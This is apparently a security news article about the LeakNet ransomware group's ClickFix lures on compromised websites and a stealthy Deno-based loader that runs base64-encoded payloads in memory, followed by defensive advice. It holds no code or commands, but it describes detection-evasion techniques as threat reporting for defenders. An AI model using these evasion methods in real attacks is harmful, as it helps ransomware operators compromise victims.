Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
India Halts WhatsApp Usernames Rollout Due to Fraud Concerns
July 1, 2026
Critical Cursor IDE RCE Vulnerabilities Allow Zero-Click Prompt Injection
July 1, 2026
Automated Password Spray Attacks Target Microsoft Azure CLI
July 1, 2026
Home/Threats/LeakNet Ransomware Uses ClickFix Lures and Deno Loader for Stealthy Attacks
Threats

LeakNet Ransomware Uses ClickFix Lures and Deno Loader for Stealthy Attacks

Key Takeaways The LeakNet ransomware group has significantly escalated its operations, moving from an average of three victims monthly to a rapid expansion. The group now employs...

David kimber
David kimber
March 18, 2026 4 Min Read
39 0

Key Takeaways

  • The LeakNet ransomware group has significantly escalated its operations, moving from an average of three victims monthly to a rapid expansion.
  • The group now employs “ClickFix” social engineering lures and a highly stealthy, Deno-based memory loader to bypass traditional security defenses.
  • ClickFix lures are hosted on legitimate but compromised websites, presenting fake Cloudflare Turnstile checks to trick users into executing malicious commands.
  • The Deno-based loader operates entirely in memory, making it exceptionally difficult for signature-based security tools to detect.
  • Defenders should focus on behavioral monitoring, restrict user command execution, and implement network egress filtering to mitigate the threat.

LeakNet Ransomware Elevates Threat with ClickFix Lures and Stealthy Deno Loader

The LeakNet ransomware collective is undergoing a significant operational transformation, abandoning its previous, slower pace of approximately three victims per month in favor of a rapid expansion. This surge in activity is underpinned by the integration of sophisticated new tools specifically engineered to bypass the majority of existing security safeguards.

Table Of Content

  • Key Takeaways
  • LeakNet Ransomware Elevates Threat with ClickFix Lures and Stealthy Deno Loader
  • ClickFix: A Broader Net for Victim Acquisition
  • The Stealthy Deno-Based Loader
  • What You Should Do

Central to LeakNet’s updated arsenal are two critical additions: a cunning social engineering tactic dubbed ClickFix and a highly evasive, memory-resident loader built upon the Deno JavaScript runtime.

ClickFix: A Broader Net for Victim Acquisition

While ClickFix itself isn’t a novel technique within the threat landscape, its adoption by LeakNet signals a pivotal shift in the group’s victim acquisition strategy. Rather than relying on purchasing stolen access credentials from initial access brokers (IABs) in illicit online marketplaces, LeakNet now deploys deceptive verification pages on compromised, yet otherwise legitimate, websites.

When an unsuspecting user navigates to one of these tainted pages, they are presented with what appears to be a standard Cloudflare Turnstile verification prompt, instructing them to manually execute a specific command. This approach lacks a defined victim profile; instead, LeakNet casts a wide net, banking on a percentage of users to fall for the ruse.

Analysts at ReliaQuest meticulously documented this activity across multiple recent incidents, confidently attributing it to LeakNet due to consistent infrastructure and identical tactics, techniques, and procedures (TTPs). This strategic pivot away from IABs is a calculated move, eliminating a dependency that previously hampered the group’s speed and dramatically expanding the pool of potential targets. ClickFix has emerged as a favored delivery mechanism across the broader threat landscape, reportedly facilitating the distribution of 59% of the top malware families tracked in 2025.

This evolving methodology places any employee browsing the web at increased risk. Because these malicious lures reside on authentic websites rather than attacker-controlled domains, conventional network-layer defenses generate significantly fewer alerts. A red flag typically only appears after a user has already executed the malicious command, emphasizing the critical role of behavioral monitoring—especially for suspicious msiexec commands and unexpected outbound connections—over exclusive reliance on domain-based blocking.

What makes LeakNet’s current campaign particularly concerning is the consistent post-exploitation chain, which remains identical regardless of the initial entry point, whether through ClickFix or Microsoft Teams phishing. The group employs the same set of tools for execution, lateral movement, and payload staging, irrespective of how initial access was gained. This operational consistency, however, offers a valuable advantage for defenders: understanding these predictable steps provides clear opportunities for detection and prompt attack termination.

The Stealthy Deno-Based Loader

A technically sophisticated and particularly dangerous component of LeakNet’s updated toolkit is a previously undocumented loader built upon Deno, a legitimate JavaScript and TypeScript runtime widely used by developers. LeakNet employs a “bring-your-own-runtime” (BYOR) strategy: instead of deploying a custom malicious binary that might trigger security tools, the attackers install the authentic, trusted Deno executable on the victim’s machine, then leverage it to execute harmful code.

The loader is activated via PowerShell and Visual Basic Script files, frequently named Romeo*.ps1 and Juliet*.vbs. Crucially, LeakNet avoids writing a JavaScript file to disk, where it could be scanned, by instead feeding the payload to Deno as a base64-encoded data URL. Deno then decodes and executes this payload entirely in memory. This technique ensures that no standard file ever touches the endpoint, rendering the entire process virtually undetectable by signature-based security tools.

Upon execution, the loader gathers fundamental system information, including username, hostname, memory size, and operating system version, subsequently generating a unique victim fingerprint. It then establishes a connection to attacker-controlled infrastructure to retrieve a victim-specific second-stage payload, prevents duplicate instances by binding to a local port, and initiates a continuous loop of fetching and executing further code directly in memory.

What You Should Do

  • Block Newly Registered Domains: LeakNet’s command-and-control (C2) servers are often newly registered. Implement policies to block access to domains registered within the last few weeks.
  • Restrict User Command Execution: Limit the ability of regular users to run Win-R commands on their workstations to prevent direct execution of malicious instructions.
  • Control PsExec Usage: Restrict PsExec to only authorized administrators through Group Policy Objects (GPOs) to prevent its misuse for lateral movement.
  • Monitor for Anomalous Activity: Watch for signs of jli.dll sideloading in the C:ProgramDataUSOShared directory, unusual PsExec activity, and unexpected outbound connections, especially to S3 buckets.
  • Implement Behavioral Monitoring: Prioritize security solutions capable of detecting suspicious behavioral patterns, particularly concerning unexpected process execution and outbound network connections, rather than relying solely on signature-based or domain-blocking tools.
  • Isolate Compromised Hosts Immediately: Upon confirming post-exploitation behavior, promptly isolate the affected host to break the attack chain before ransomware deployment.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackExploitMalwarephishingransomwareSecurityThreat

Share Article

David kimber

David kimber

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.

Previous Post

Fancy Bear Exposes Stolen Credentials, 2FA Secrets from NATO-Linked Targets

Next Post

Critical ForceMemo Flaw Hijacks GitHub Accounts, Backdoors Python Repos

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Fluentd Vulnerabilities Allow Remote Code Execution
July 1, 2026
Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
July 1, 2026
Critical Adobe ColdFusion Vulnerabilities Let Attackers Run Code
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us